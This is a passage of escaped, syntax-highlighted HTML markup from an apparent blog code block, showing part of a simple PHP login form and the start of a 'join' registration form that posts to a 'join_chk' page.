!important;&quot;&gt;/&lt;/span&gt;&lt;span class=&quot;crayon-i&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;tr&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a5a263262138-14&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;lt;&lt;/span&gt;&lt;span class=&quot;crayon-i&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;tr&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;gt;&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;lt;&lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;td &lt;/span&gt;&lt;span class=&quot;crayon-i&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;colspan&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;2&quot;&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;gt;&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;lt;&lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;input &lt;/span&gt;&lt;span class=&quot;crayon-i&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;type&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;submit&quot;&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-i&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;value&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;Login&quot;&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-i&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;style&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;width: 100%;&quot;&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;gt;&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;lt;&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;/&lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;td&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;gt;&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;lt;&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;/&lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;tr&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a5a263262138-15&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;lt;&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;/&lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;table&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a5a263262138-16&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;lt;&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;/&lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;form&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a5a263262138-17&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;lt;&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;/&lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;p&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a5a263262138-18&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-ta&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(255, 0, 0) !important;&quot;&gt;&amp;lt;?php&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a5a263262138-19&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;}&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a5a263262138-20&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-st&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;elseif&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$page&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;==&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;join&quot;&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;{&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a5a263262138-21&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-ta&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(255, 0, 0) !important;&quot;&gt;?&amp;gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a5a263262138-22&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;lt;&lt;/span&gt;&lt;span class=&quot;crayon-i&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;h3&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;gt;&lt;/span&gt;&lt;span class=&quot;crayon-i&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;Join&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;lt;&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;/&lt;/span&gt;&lt;span class=&quot;crayon-i&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;h3&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a5a263262138-23&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;lt;&lt;/span&gt;&lt;span class=&quot;crayon-i&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;p&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a5a263262138-24&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;lt;&lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;form &lt;/span&gt;&lt;span class=&quot;crayon-i&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;action&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;./?page=join_chk&quot;&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-i&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;method&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;POST&quot;&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a5a263262138-25&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;lt;&lt;/span&gt;&lt;span class=&quot;crayon-i&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;table&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a5a263262138-26&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span 